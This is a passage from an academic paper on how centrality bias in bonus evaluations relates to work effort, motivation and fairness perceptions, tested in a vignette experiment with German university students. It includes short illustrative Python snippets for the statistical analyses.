However, a potential drawback of subjective performance evaluation is its inherent discretion (Ittner et al. 2003; Moers 2005; Van der Stede et al. 2006). Prior research indicates that subjective performance evaluation often implies inaccuracies due to systematic measurement errors (Ahn et al. 2010; Bol 2011), suggesting that performance assessments by superiors are biased. In this context, leniency bias and centrality bias are two frequently observed patterns (Bol 2011; Frederiksen et al. 2017; Moers 2005; Prendergast 1999).2 Leniency bias is the tendency to inflate performance rewards, whereas centrality bias leads to compressed ratings. As the result of the latter, the variance in the ratings by the superior is lower than the variance in the performance of the evaluated employees (Bol 2008; Golman and Bhatia 2012). In other words, performers below (above) the average receive a higher (lower) reward than they are actually entitled to according to their performance (Bol et al. 2016). From a superior’s perspective, it may be situationally rational to provide biased rewards. For instance, leniency bias may occur because the superior cares about the well-being of his subordinates or intends to avoid costs arising out of negative evaluations (Frederiksen et al. 2017; Kampkötter and Sliwka 2016). A lower differentiation of evaluations, as implied by centrality bias, may result from a superior’s inequality aversion or imprecise signals regarding the subordinates’ individual performance. It may also alleviate within-team competition and promote cooperation (Kampkötter and Sliwka 2016, 2017).
Irrespective of these arguments, prior research stresses the adverse effects of centrality bias as predicted by economic theory (Baker et al. 1988; Prendergast 1999). Empirical evidence on the effects of centrality bias is scarce, potentially due to the lacking availability of corresponding company data sets and difficulties in getting access to them. However, the few exceptions that investigate the effects of centrality bias empirically tend to suggest that it is negatively associated with performance improvements (Ahn et al. 2010; Berger et al. 2013; Bol 2011; Engellandt and Riphahn 2011). This stream of research argues—in line with economic theory—that performance evaluations which are subject to centrality bias neither reward performance improvements nor sanction performance deteriorations adequately. As a consequence, individuals are expected to neglect performance enhancing efforts (Ahn et al. 2010).
This perspective, however, does not account for the full complexity of human behaviour which is not one-dimensionally motivated by external mechanisms. In this paper, we therefore argue—based on insights from the social psychology literature—that centrality bias may activate different psychological mechanisms with opposing behavioural implications. Correspondingly, we explore the different psychological mechanisms that may be triggered by centrality bias and shed light on their net effect. More precisely, we analyse whether the relationship between centrality bias and the willingness to exert work effort is mediated by controlled motivation and autonomous motivation—two types of motivation distinguished by self-determination theory—and by procedural fairness perceptions. Given that previous research has focused on the relationship between centrality bias and subsequent performance, we intend to open the intermediate “black box” by shedding light on the different psychological mechanisms that may explain prior empirical findings. An implicit idea inherent in this study is that the behavioural implications of centrality bias might be less uncontested than suggested by the prior literature. Indeed, this idea is reflected by Kampkötter and Sliwka (2017). Their findings suggest that differentiation (which implies the absence of a centrality bias) in performance appraisals is situationally related to lower subsequent performance. This finding challenges the prevailing notion that centrality bias has adverse effects per se.
In addition to opening the “black box” of psychological mechanisms, our paper emphasizes two particularities that may affect the behavioural implications of centrality bias: With the exception of Bol (2011), prior research usually does not take into consideration that the effect of centrality bias is likely to differ for above-average performers as compared to below-average performers. Therefore, we take this differentiation into account and investigate the psychological mechanisms activated by centrality bias separately for above-average and below-average performers. Moreover, prior research mostly measures centrality bias based on individual sequences of performance appraisals and assumes that employees adapt their efforts as they anticipate future evaluations based on past rewards (Kampkötter and Sliwka 2017). In these studies, employees are usually not aware of whether the rewards of their peers are to the same degree subject to bias. In fact, the tendency to undervalue above-average performers and to overvalue below-average performers implies an unequal treatment of employees, suggesting that employees are to different degrees affected by centrality bias. According to insights from the social psychology literature, awareness or unawareness of the varying degrees to which employees are affected by centrality bias may have an impact on the psychological mechanisms and their behavioural implications. Against this background, we study how the availability of peer information, which unveils that above-average performers (below-average performers) are systematically undervalued (overvalued), is related to the psychological mechanisms activated by centrality bias.
We investigate our research questions and hypotheses in a vignette experiment with 425 students enrolled in a German university. Vignette experiments present participants a constructed description of a situation and capture their intentions and attitudes (Aguinis and Bradley 2014). In the present study, the participants faced a hypothetical work situation and were asked to complete a questionnaire which informs us about their willingness to exert work effort, their controlled and autonomous motivation and fairness perceptions. In line with our theoretical expectations, we detect a considerable asymmetry in the effects of centrality bias. More precisely, we find that centrality bias is significantly and negatively related to the willingness to exert work effort for above-average performers, but unrelated for below-average performers. With regard to the psychological mechanisms, we find that the relationship between centrality bias and the willingness to exert work effort is mediated by controlled motivation and procedural fairness perceptions for above-average performers. We detect a direct effect of procedural fairness perceptions on the willingness to exert work effort and an indirect one via autonomous motivation. For below-average performers, we find that centrality bias is positively related to procedural fairness perceptions which are, however, unrelated to the willingness to exert work effort. Interestingly and opposing to our predictions, we find that the disclosure of peer information has not a significant impact on the psychological mechanisms at work. Taken together, our study provides insights into the behavioural implications of centrality bias that go beyond the suggestions by economic theory. In this way, we complement the prior literature on centrality bias which mostly assumes negative effects on work effort and therefore focuses on its determinants (Bol 2011; Bol et al. 2016; Breuer et al. 2013; Chen 2014; Moers 2005; Woods 2012).
This paper is structured as follows. In Sect. 2, we develop our research questions and hypotheses based on insights from the social psychology literature. In Sect. 3, we describe the experimental procedure. We present our findings in Sect. 4 and discuss them in Sect. 5.
2 Hypotheses and research questions
2.1 Background
We explore the psychological mechanisms activated by centrality bias based on a hypothetical work situation, in which a superior determines a bonus for five subordinates to compensate their work effort.3 While an objective measure of work effort is available for bonus assessment, the superior may discretionarily adjust the financial rewards. If the superior makes use of his discretion, a centrality bias emerges in our setting. We are interested in how these subjective adjustments affect the subordinates’ willingness to exert work effort in the future period. In this context, the following lines of reasoning rely on two main ideas: First, we assume that the behavioural implications of centrality bias may depend on whether a subordinate has performed below or above the average. Second, we expect that the behavioural response also depends on whether a subordinate has not only information about his own reward, but also about the rewards of his peers (“peer information”). Based on insights from the social psychology literature, we thus discuss in the following the mediating role of different psychological mechanisms and the moderating role of peer information.
2.2 The mediating role of controlled motivation
Unlike traditional economic theory, which assumes that individuals are solely extrinsically motivated, self-determination theory provides a typology of different motivation types. A core idea of self-determination theory is the distinction between controlled and autonomous motivation (Gagné and Deci 2005). Both types of motivation are expected to increase the willingness to exert work effort (Kunz 2015). Controlled motivation is, in line with the assumptions of economic theory (Bonner and Sprinkle 2002; Eisenhardt 1989), regulated by external mechanisms, such as monetary rewards (Kunz 2015; Zapata-Phelan 2009). Correspondingly, we assume that an individual’s controlled motivation is likely to be higher when performance-contingent monetary rewards are offered as compared to a situation in which no rewards are provided (Bonner and Sprinkle 2002; Kunz and Pfaff 2002). The motivational effect of monetary rewards is likely to be highest when there is a direct relationship between an individual’s effort and the evaluation outcome. Centrality bias, however, mitigates this relationship (Prendergast 1999). Due to deflated performance evaluations, above-average performers (below-average performers) receive a lower (higher) reward than they would receive based on their effort. Moreover, an increase in effort leads to a disproportionally low increase in monetary rewards (Berger et al. 2013; Bol 2011). Against this background, inducing more effort does not “pay off” adequately. If an individual is subject to centrality bias, we thus expect that the impact of monetary rewards on controlled motivation decreases, given that a marginal decline in effort is likely to imply a disproportionally low decline in rewards (Golman and Bhatia 2012). Therefore, we expect that above-average as well as below-average performers who are subject to centrality bias have less controlled motivation to exert work effort. Correspondingly, we formulate the following hypothesis (H):4
H1: Centrality bias is negatively related to controlled motivation.
2.3 The mediating role of autonomous motivation
According to self-determination theory, an individual’s actions are not entirely driven by external mechanisms such as monetary rewards. Instead, it suggests that individuals are also autonomously motivated to engage in a task because of enjoyment or identification with the value and meaning that an activity implies (Gagné et al. 2015).5 Self-determination theory states that autonomous motivation is influenced by the satisfaction of three basic psychological needs—autonomy, competence and relatedness (Deci and Ryan 2000; Van den Broeck et al. 2010). The need for autonomy reflects an individual’s need to feel self-determined and to have possibilities of choice (Deci and Ryan 2000; Gagné and Deci 2005). The need for competence refers to the experience of success in performing tasks and attaining intended outcomes (Deci et al. 2001). The need for relatedness captures the need to feel connected to others (Deci and Ryan 2000).
Self-determination theory argues that autonomous motivation can be influenced via contextual factors that address these psychological needs. According to Gagné and Forest (2008), compensation systems represent one of these contextual factors. In particular, the provision of rewards may derogate the feeling of autonomy as they put individuals under pressure to achieve a particular target and make them feel restricted in their decision-making about which actions need to be performed (Deci and Ryan 2000; Kunz and Linder 2012). At the same time, such rewards positively impact the feeling of competence as they imply feedback on an individual’s task performance and goal attainment (Deci et al. 2001; Gagné and Forest 2008).
We argue that centrality bias may influence the satisfaction of these needs and thus expect autonomous motivation to mediate the relationship between centrality bias and the willingness to exert work effort. Previous research suggests that positive feedback is able to enhance the feeling of competence (Deci and Ryan 2000). In presence of a centrality bias, below-average performers receive an inflated reward. The corresponding overvaluation of their work effort may be perceived as a recognition, signalling success in performing the evaluated task and thus contributing to the feeling of competence. In contrast, above-average performers receive a deflated reward. This “undervaluation” may be perceived as negative feedback, suggesting that a task is not successfully performed. Therefore, centrality bias is likely to decrease the feeling of competence for above-average performers.
With regard to autonomy, we argue that the clouding of the link between an individual’s effort and the resulting reward may be perceived as a restriction of autonomy. If individuals strive for a particular outcome, they can be less sure on whether their choices of action yield the intended outcome, given that the performance evaluation is less sensitive to their actual work. The mitigation of the linkage between effort and reward may therefore diminish the feeling of having possibilities of choice. We predict that this adverse effect of centrality bias applies to above-average as well as below-average performers likewise.
Concerning the feeling of relatedness, the literature suggests that it is satisfied, for instance, when superiors appear caring (Deci and Ryan 2000).6 Against this background, below-average performers may interpret their disproportionally high reward as “distal support” (Deci and Ryan 2000, p. 235) for their efforts that may contribute to the feeling of a close connection with the superior. In contrast, above-average performers may perceive the disproportionally low reward as a signal of personal distance and lack of sufficient acknowledgement. Therefore, centrality bias may mitigate the feeling of relatedness on part of above-average performers. Taken together, we expect that centrality bias decreases the satisfaction of all three psychological needs for above-average performers, leading to the following hypothesis:
H2: Centrality bias is negatively related to autonomous motivation of above-average performers.
For below-average performers, we argue that the feeling of autonomy is likely to decrease, whereas the feelings of competence and relatedness may increase. Depending on how these effects outweigh, there might be a positive or negative relationship or no association at all. Given that the presence and the sign of the relationship are unclear ex ante, we pose the following research question (RQ):
RQ1: How is centrality bias related to autonomous motivation of below-average performers?
2.4 The mediating role of procedural fairness perceptions
Previous research suggests that the perceived fairness of performance evaluation is another psychological mechanism that influences individual behaviour as it affects work-related attitudes and outcomes (Burney et al. 2009; Lau and Tan 2006). Empirical evidence indicates that employees are more committed to work and perform better in their tasks if they perceive performance evaluations as fair (Colquitt et al. 2001). Correspondingly, we predict a positive relationship between the perceived fairness of performance evaluation and the willingness to exert work effort. With regard to fairness perceptions, the management accounting literature distinguishes two dimensions of fairness: distributive fairness—which refers to the perception of the distribution of outcomes among employees (Burney et al. 2009)—and procedural fairness—which reflects the perceived fairness of procedures that are used in the context of performance evaluation (Burney et al. 2009; Voußem et al. 2016). Given that our paper refers to bias as part of the performance evaluation process, we focus on the procedural fairness of the performance evaluations (Hartmann and Slapničar 2012b).
In a recent paper, Voußem et al. (2016) analyse the relationship between subjective performance measures and fairness perceptions. They detect an inverted U-shaped relationship implying that subjectivity in performance evaluations increases the perceived fairness if the weight placed on the subjective measures is low. If a higher weight is placed on subjective performance measures, however, subjectivity decreases fairness perceptions. These findings support their line of reasoning that subjective performance measurement implies costs and benefits. They argue that, as the emphasis on subjectivity increases, the marginal benefits are likely to decrease, whereas the marginal costs increase. Voußem et al. (2016) consider biased evaluations as part of the costs of subjective performance evaluations. However, the relationship between centrality bias and procedural fairness perceptions has not yet been investigated explicitly.
Our prediction for the relationship between centrality bias and procedural fairness perceptions draws on referent cognitions theory which argues that individuals rely on reference comparisons in assessing fairness (Cropanzano and Folger 1989; Goldman 2003). More precisely, this theory suggests that individuals reflect on performance evaluation outcomes by generating mental simulations and comparing the actual outcome with a potential outcome that relies on a procedure, which is considered to be valid (McFarlin and Sweeney 1992; van den Bos and van Prooijen 2001). If the potential outcome is more favourable and the procedure used to determine the actual outcome appears less valid, individuals are expected to feel treated unfairly. We suggest that such comparisons appear particularly likely in situations in which the superior has the discretion to adjust an objective measure. In this setting, we expect that the potential outcome based on the objective measure without adjustments is likely to serve as a reference. In presence of a centrality bias, above-average performers receive a reward that falls short of the unbiased evaluation. Therefore, we expect that above-average performers consider the process underlying the biased outcome unfair and penalize it with lower effort.
H3: Centrality bias is negatively related to procedural fairness perceptions of above-average performers.
For below-average performers, the actual outcome is more favourable than the potential one according to the objective performance measure, suggesting that the superior applies a benevolent appraisal procedure. At the same time, the procedure for determining the reward is not discernible for the subordinate and thus may be perceived as less valid. In particular, below-average performers cannot rule out that the procedure will put them at a disadvantage in the future, even though they currently benefit from it. Due to this ambiguity inherent in the relationship between centrality bias and procedural fairness perceptions for below-average performers, there might be a positive or negative relationship or no association at all. For this reason, we pose the following research question:
RQ2: How is centrality bias related to procedural fairness perceptions of below-average performers?
The aforementioned lines of reasoning suggest a direct relationship between procedural fairness perceptions and the willingness to exert work effort. However, the prior literature also provides arguments and corresponding evidence for an indirect effect: Procedural fairness perceptions may be positively related to autonomous motivation (Hartmann and Slapničar 2012a; Zapata-Phelan et al. 2009). In particular, an evaluation process that is perceived as fair (unfair) may enhance (mitigate) the feeling of relatedness with the superior. This argument is in line with the reasoning by Cugueró-Escofet and Rosanas (2013) that procedural fairness perceptions may lead to a sense of belonging and thus may improve the feeling of relatedness with the superior. In addition, procedural fairness perceptions may be stronger when rewards reflect organizational objectives more clearly, implying lower ambiguity for an individual's work role (Hartmann and Slapničar 2012a, b). Such perceptions may reinforce the feeling of competence and thus imply a positive relationship between procedural fairness perceptions and autonomous motivation. Taken together, we suggest that fairness perceptions may affect the willingness to exert work effort directly as well as indirectly via autonomous motivation. In the findings section, our data analysis will consider both options.
2.5 The moderating role of peer information
Prior research does not take into consideration whether the individuals who are subject to a centrality bias are aware of the degree to which their peers are affected (Bol 2011; Engellandt and Riphahn 2011; Kampkötter and Sliwka 2017). However, theoretical insights suggest that peer information may have an impact on the association of centrality bias with autonomous motivation as well as with procedural fairness perceptions. For this reason, we discuss the moderating role of peer information in the following.
Social comparison theory suggests that individuals compare themselves with peers when the outcome of performance evaluations is available—even when they are not competing for a tangible outcome (Luft 2016; Tafkov 2013). Empirical evidence suggests that the disclosure of rankings motivates individuals to exert more work effort and to improve their performance relative to others (Hannan et al. 2013; Newman and Tafkov 2014). However, in the case of centrality bias, we argue that the disclosure of peer information is likely to further decrease an employee's autonomous motivation to exert work effort. In the presence of centrality bias, the provision of peer information reveals a systematic measurement error if information on actual work effort is available. Correspondingly, below-average performers are likely to recognize that their inflated reward is not driven by a specific acknowledgement or a close relationship with their superior.7 Moreover, the overvaluation of their performance as well as the undervaluation of above-average performers may imply that the relatedness among subordinates decreases. For this reason, we expect that the enhancement of the feelings of competence and relatedness due to inflated ratings—as suggested in Sect. 2.3—is mitigated.
Similarly, above-average performers learn that their peers with a below-average performance have received inflated rewards, while they themselves were subject to a deflated evaluation (Hartmann and Slapničar 2012b). This awareness is likely to decrease the feeling of relatedness among the subordinates. Moreover, the feeling of autonomy might suffer further if above-average performers find that an increase in effort is even likely to widen the discrepancy between their actual effort and their evaluation. Against this background, we state the following hypothesis:
H4: Peer information reinforces the effect of centrality bias on autonomous motivation.
The provision of peer information may also impact the relationship between centrality bias and procedural fairness perceptions. While the referent cognitions theory introduced in Sect. 2.4 predicts that fairness perceptions are based on a comparison of the actual performance evaluation outcome and a potential one, equity theory assumes that fairness perceptions are contingent on a comparison of an individual’s own “return on effort” and the returns received by his peers (Adams 1965). According to equity theory, individuals expect to receive an “appropriate rate of return”, which is the ratio of the benefits an individual receives (i.e., outcomes) and the contributions an individual makes (i.e., input) (Greenberg et al. 2007). Equity theory further assumes that an individual compares his own rate of return with those of his peers. In this context, equity is obtained if the rates of return (i.e., the output-input ratios) are equal among the focal individual and his peers (Adams 1965). This equity considerably shapes the fairness perception of an evaluation process.
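To make the equity comparison concrete, the following toy calculation (our illustration; all numbers are invented and not taken from the study) contrasts equal and unequal return-on-effort ratios in Python:

# Toy illustration of equity theory's outcome-to-input comparison (numbers invented).
def return_on_effort(bonus, overtime_hours):
    # "Rate of return": outcome received per unit of input contributed.
    return bonus / overtime_hours

# Unbiased evaluation: bonuses proportional to overtime, so the ratios are equal (equity).
print(return_on_effort(300, 30), return_on_effort(100, 10))  # 10.0 and 10.0

# Compressed evaluation: the high performer is undervalued, the low performer
# overvalued, so the ratios diverge (inequity).
print(return_on_effort(250, 30), return_on_effort(150, 10))  # ~8.3 and 15.0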
Centrality bias leads to inequity, given that the undervaluation of above-average performers and the overvaluation of below-average performers imply different rates of return. Therefore, we assume that above-average performers who have access to peer information will consider their reward unfair. Due to the perceived unfairness, an undervalued individual is expected to restore equity by decreasing his input (Carrell and Dittrich 1978; Franco-Santos et al. 2012). Thus, we expect that the negative relationship between centrality bias and procedural fairness perceptions becomes stronger. In a similar vein, we expect that below-average performers consider the inequity resulting from centrality bias unfair as well if they are inequity averse, even though they are currently beneficiaries of this bias. Formally stated, these expectations lead to the following hypothesis:
H5: Peer information reinforces the effect of centrality bias on procedural fairness perceptions.
2.6 Summary
Summary of conceptual model
3 Method
3.1 Experimental design
We investigated our hypotheses and research questions by using a vignette experiment with a 2 × 2 × 2 × 2 between-subjects design. Thus, the experiment relies on 16 different vignettes. A vignette is “a short, carefully constructed description of a person, object, or situation, representing a systematic combination of characteristics” (Atzmüller and Steiner 2010, p. 128). It consists of a series of text modules, for which the experimenters construct different attributes. In line with Kunz (2015), the vignettes used in our study rely on a binary set of attributes for each of the four varying text modules. Like other types of experiments, vignette experiments offer a high degree of internal validity because the experimenters have control over the variables (Birnberg et al. 1990). However, vignette experiments do not capture the participants’ actual behaviour, but their behavioural intentions (Kunz and Linder 2012). Therefore, vignette experiments appear particularly applicable to studies that intend to assess unobservable measures such as intentions and attitudes (Aguinis and Bradley 2014; Kunz and Linder 2012). Hence, the vignettes are complemented by a questionnaire that captures these intentions and attitudes. In our case, the questionnaire primarily refers to the participants’ motivation and fairness perception as well as their willingness to exert additional work effort against the background of the described situation.
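For illustration only, the 16 cells of such a 2 × 2 × 2 × 2 design can be enumerated programmatically; the sketch below is ours, and the factor labels merely approximate the manipulations described in Sect. 3.2.1:

from itertools import product

# Assumed factor labels; the authors' exact wording differs (see the Appendix of the paper).
factors = {
    "PERFORMANCE": ["above-average", "below-average"],
    "BIAS": ["centrality bias", "no bias"],
    "PEER": ["peer information", "no peer information"],
    "SITUATION": ["positive climate", "negative climate"],
}

# One vignette per combination of attribute levels.
vignettes = [dict(zip(factors, combo)) for combo in product(*factors.values())]
assert len(vignettes) == 16  # one vignette per cell of the between-subjects design

for number, cell in enumerate(vignettes, start=1):
    print(number, cell)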
As in Kunz (2015) and Kunz and Linder (2012), the participants read the description of a hypothetical work situation and were asked to decide on the degree of additional work effort they would be willing to exert. The work situation stated that the participant worked as a consultant who was engaged in a management accounting project along with the project manager and four further consultants with working experience similar to that assumed for the participant (see the Appendix for the full text). The vignette contained some information about the work climate to help participants relate to the situation. The participants were told that they receive a bonus payment to compensate them for their prior work effort, given that the first of four project milestones had just been completed. The text declared the determination of the bonus a responsibility of the project manager. It went on to state that the executive board of the consulting firm recommended that the project manager refer to the individual overtime hours for the bonus assessment; ultimately, however, the project manager was authorized to decide on the rewards freely and entirely on his own. For this reason, our setting reflects a situation in which the superior has the discretion to adjust an objective measure (i.e., overtime hours) based on his subjective assessment. Given that the experimental variables rely on newly developed specifications, we pre-tested and discussed the vignettes with several management accounting researchers as well as 24 graduate students who were not part of the final sample. Based on their feedback, we slightly adjusted the wording of individual text modules.
3.2 Measures
3.2.1 Experimental variables
Fig. 2: Graphic representation of bonus payments and overtime hours included in the vignettes
The third variable captures the provision of peer performance and compensation information. If peer information was provided, a figure showed the proportion of the bonus received by the participant and the rewards received by his or her colleagues (Panels B and C in Fig. 2). For simplicity, we indicated a linear relationship between the overtime provided and the bonuses received. The provision of peer information (PEER) was coded 1 for the regression analyses and 0 otherwise. Finally, we manipulated the overall work situation by describing either a relatively positive or a relatively negative work environment. For this purpose, we drew on the text modules from Kunz (2015). The positive work situation (SITUATION) was coded 1, the negative one 0 (see footnote 8). In contrast to the aforementioned explanatory variables, the work situation is a control variable intended to make the scenario more realistic and to avoid that the participants relate the scenario to a specific situation from their own experience, which would be outside the experimenters’ control (Kunz 2015).
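As a minimal sketch (invented rows; only the variable names PEER and SITUATION follow the paper), the binary manipulations can be represented as 0/1 indicator columns for the later regression analyses:

import pandas as pd

# Invented example rows; in the actual study each participant saw exactly one vignette.
df = pd.DataFrame({
    "peer_info": ["disclosed", "not disclosed", "disclosed"],
    "climate":   ["positive", "negative", "negative"],
})

df["PEER"] = (df["peer_info"] == "disclosed").astype(int)    # 1 = peer information provided
df["SITUATION"] = (df["climate"] == "positive").astype(int)  # 1 = positive work situation
print(df)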
3.2.2 Dependent variable
Statistics regarding work effort scale
3.2.3 Motivation types
Statistics regarding motivation scales
3.2.4 Procedural fairness perceptions
Statistics regarding procedural fairness scale
3.2.5 Control variables
To test the ecological validity of the vignettes, we included three questions on their comprehensibility, traceability and closeness to reality from Kunz (2015). The participants were asked to state their degree of agreement based on a 7-point Likert scale. Comprehensibility was measured based on the item “How well did you understand the presented work situation?” (COMPREHEN; 1 = very poorly; 7 = very well), while the item “How easily could you put yourself into the presented work situation?” measured the traceability of the vignettes (TRACE; 1 = very difficult; 7 = very easy). Finally, the item “How would you rate the closeness of the work situation described above to real-life situations?” measured the perceived closeness to reality (REALITY; 1 = very unrealistic; 7 = very realistic). Furthermore, we controlled for the participants’ age (AGE; in years) and gender. For the latter, we introduced the variable FEMALE, which equals 1 in the case of female participants and 0 otherwise. We also considered that the attractiveness of consultancy work may have an impact on the willingness to exert work effort in the given situation. For this reason, we added an item asking “How attractive is a career as a consultant for you (irrespective of the described situation)?” (ATTRACTIVE; 1 = very unattractive; 7 = very attractive). Finally, we relied on the dummy variable EXPOSURE to distinguish between graduate and undergraduate students, for the rationale outlined in Sect. 3.3. All these items entered our analyses as control variables.
3.3 Data collection
The participants in our experiment were 325 undergraduate students and 126 graduate students in business administration enrolled at a German university.10 We excluded the questionnaires from 21 undergraduate students and 5 graduate students as they failed the manipulation check. Therefore, we used 425 responses in total for our analyses. t-tests on all variables (except for AGE) did not reveal any significant differences.11 Therefore, we considered both samples simultaneously in our analyses. In line with our between-subjects design, each participant received one randomly assigned vignette with the questionnaire. We refrained from providing detailed information on the study’s objectives to ensure that the participants answered the questionnaire without bias. Therefore, the students were only told that the study contributes to a deeper understanding of the effects of performance measurement systems. To minimise the threat of socially desirable responses, full anonymity and confidentiality were guaranteed (Kunz 2015).
Because we rely on students, our participants have limited working experience, which may confine the external validity of our findings. However, in line with Kunz (2015) we argue that the involvement of students has at least two major advantages. On the one hand, students are used to being evaluated during their university and school education. In many cases, such evaluation relies on subjective assessments. For this reason, they have developed some understanding of the situation described in the vignettes. On the other hand, they are unlikely to have formed a notion yet of a generally accepted design of a performance measurement system or of a socially desired reaction to it. Therefore, past experiences with performance measurement systems are unlikely to confound our findings. Nevertheless, the graduate students participating in our study may have attended lectures on subjective performance measurement. If they are familiar with performance evaluation biases, issues regarding socially desirable answers might occur. This concern is put into perspective by the fact that the master’s curriculum at the university at which the experiment took place does not cover issues related to subjective performance evaluation. However, as we cannot rule out entirely that the graduate students have higher exposure to performance measurement topics, we added the control variable EXPOSURE as outlined above.
Despite these limitations, we argue that the students’ familiarity with evaluations in general is likely to increase the understandability and traceability of the presented situation. At the same time, we argue that their limited experience with performance measurement systems contributes to the internal validity of our study as it appears less of a concern that past experiences interact with the participants’ attitude revealed in the experiment.
4 Findings
4.1 Manipulation checks and descriptive statistics
We included several items in the questionnaire to check the effectiveness of our manipulations. For all manipulation check items, we asked the participants to state their level of agreement on a 7-point Likert scale (1 = I do not agree at all; 7 = I fully agree). For the examination of the performance manipulation, we used the item “My overtime hours are above the project team average”. The mean score on this item is significantly (t = 28.68, p < 0.001) higher in the above-average performance condition (mean = 5.85, SD = 1.62) than in the below-average performance condition (mean = 1.85, SD = 1.24). To test the manipulation of centrality bias, we relied on the item “The bonus that I have received corresponds with the bonus to which I am eligible based on my overtime hours”. The mean score on this item is 2.21 (SD = 1.45) in the bias condition and 5.32 (SD = 1.59) in the non-bias condition. We find that the difference between the scores is highly significant (t = 21.04, p < 0.001). For the test on the disclosure of peer information, we included the item “I know the ratio of my bonus to those of my colleagues”. The mean score on this item is higher for the condition in which peer information is disclosed (mean = 5.88, SD = 1.34), as compared to the situation in which such information is not available (mean = 2.20, SD = 1.81). This difference is significant (t = 23.57, p < 0.001). As our manipulation of work climate refers to the participant’s self-determination in the work process as well as to the cooperation behaviour in the team, we included two items to test the effectiveness of our work climate manipulation. The item reflecting the first dimension states “The project work enables me to perform tasks self-determinately”. The mean score for the condition with a good work climate is 5.80 (SD = 0.92) as compared to a mean of 2.58 (SD = 1.59) for the condition with poor work climate. The difference is significant (t = 25.52, p < 0.001). The item on cooperation states “The project work is characterized by a cooperative mode of operation”. We find that the mean score is significantly (t = 22.96, p < 0.001) higher for the condition of good work climate (mean = 5.91, SD = 0.95) as compared to the condition of poor work climate (mean = 2.97, SD = 1.61). In light of these findings, we conclude that all of our manipulations were effective.
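Each of these checks amounts to an independent-samples t-test on the 7-point item scores; a brief sketch with invented data (not the study's responses) looks as follows:

import numpy as np
from scipy import stats

# Invented 7-point Likert responses to the performance manipulation check item,
# split by experimental condition.
above_average_condition = np.array([6, 7, 5, 6, 7, 6, 5, 7])
below_average_condition = np.array([2, 1, 2, 3, 1, 2, 2, 1])

t_stat, p_value = stats.ttest_ind(above_average_condition, below_average_condition)
print(f"t = {t_stat:.2f}, p = {p_value:.4f}")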
Descriptive statistics on the willingness to exert work effort (OVERTIME)
Further insights are provided when we separate the participants in the above-average performance condition (Panel B) from those in the below-average performance condition (Panel C). We find the highest mean score for above-average performers in the cell without centrality bias but with disclosure of peer information (mean = 16.04, SD = 4.38). The mean score is the lowest for above-average performers who are subject to bias and do not have peer information (mean = 12.46, SD = 4.50). For above-average performers, t-tests indicate that the mean differences between the conditions with and without centrality bias are significant at the 0.01 level. For the below-average performers, the difference between the mean scores in the conditions with and without centrality bias is considerably lower. Correspondingly, the t-tests find that the difference in means is not significant. Nevertheless, we observe the tendency that participants in the below-average condition are on average willing to exert slightly more effort in the presence of centrality bias than in the non-bias condition when peer information is disclosed. The reverse holds for the conditions in which no peer information is given.
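Cell statistics of this kind can be computed with a grouped aggregation; the sketch below uses simulated data and the paper's variable names, and does not reproduce the reported values:

import numpy as np
import pandas as pd

rng = np.random.default_rng(0)
n = 160
df = pd.DataFrame({
    "BIAS": rng.integers(0, 2, n),
    "PEER": rng.integers(0, 2, n),
    "OVERTIME": rng.normal(14, 4, n),  # invented effort scores
})

# Mean, standard deviation and count of OVERTIME per design cell (BIAS x PEER).
cells = df.groupby(["BIAS", "PEER"])["OVERTIME"].agg(["mean", "std", "count"])
print(cells.round(2))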
4.2 The overall effect of centrality bias on the willingness to exert work effort
Table 5: OLS regression results on the direct effect of centrality bias on the willingness to exert work effort
4.3 The mediating effects of motivation and fairness perceptions
Our theoretical considerations suggest that controlled motivation, autonomous motivation and procedural fairness perceptions may mediate the relationship between centrality bias and the willingness to exert work effort. For this reason, they may explain the reported overall effects. Mediation models include two causal paths: the direct relationship between the independent variable (BIAS) and the dependent variable (OVERTIME) as well as an indirect relationship including one path from BIAS to the mediator (AUT_MOT, CON_MOT and FAIRNESS, respectively) and one from the mediator to OVERTIME. Correspondingly, Baron and Kenny (1986) suggest estimating a series of regression models to test for mediation. In line with the aforementioned causal paths, OVERTIME is first regressed on BIAS. In a second step, the mediator is regressed on BIAS. Finally, OVERTIME is regressed on BIAS and the mediator. To establish mediation, BIAS must be significantly related to OVERTIME in the first equation and to the mediator in the second equation. In addition, the mediator must be significantly related to OVERTIME in the third equation. A partial mediation requires that the relationship between BIAS and OVERTIME is weaker in the third equation than in the first one. In other words, if there is a mediation, the direct relationship between BIAS and OVERTIME is weaker when we control for the indirect effect of BIAS on OVERTIME through the mediator. In the case of a full mediation, there is no significant relationship between BIAS and OVERTIME in the third equation (Baron and Kenny 1986).
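A bare-bones sketch of these three steps with simulated data is shown below (statsmodels OLS; the coefficients and generated data are placeholders, not the paper's estimates):

import numpy as np
import pandas as pd
import statsmodels.api as sm

rng = np.random.default_rng(1)
n = 400
df = pd.DataFrame({"BIAS": rng.integers(0, 2, n)})
df["AUT_MOT"] = 4.0 - 0.8 * df["BIAS"] + rng.normal(0, 1, n)                      # mediator
df["OVERTIME"] = 10.0 + 2.0 * df["AUT_MOT"] - 1.0 * df["BIAS"] + rng.normal(0, 2, n)

# Step 1: total effect of BIAS on OVERTIME.
step1 = sm.OLS(df["OVERTIME"], sm.add_constant(df[["BIAS"]])).fit()
# Step 2: effect of BIAS on the mediator.
step2 = sm.OLS(df["AUT_MOT"], sm.add_constant(df[["BIAS"]])).fit()
# Step 3: OVERTIME on BIAS and the mediator jointly; a BIAS coefficient that shrinks
# relative to step 1 indicates (partial) mediation.
step3 = sm.OLS(df["OVERTIME"], sm.add_constant(df[["BIAS", "AUT_MOT"]])).fit()

print(step1.params["BIAS"], step2.params["BIAS"], step3.params[["BIAS", "AUT_MOT"]])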
Table 6: Mediation analysis on the indirect effect of centrality bias on the willingness to exert work effort
As shown in Panel A, we find that BIAS is negatively and significantly associated with AUT_MOT and CON_MOT respectively (Rows 1 and 2). These findings suggest that both types of motivation decrease in presence of BIAS. Row 4 reports positive and significant coefficients for both types of motivation on the willingness to exert work effort. Moreover, we find that the coefficient for BIAS is considerably smaller when we control for the indirect effect through the mediators as compared to the regression that estimates the direct effect of BIAS only (see Table 5). These findings suggest that the relationship between BIAS and OVERTIME is partially mediated by autonomous as well as controlled motivation. In contrast, we do not find that BIAS is significantly associated with FAIRNESS (Row 3), suggesting that FAIRNESS does not mediate the relationship between BIAS and OVERTIME.
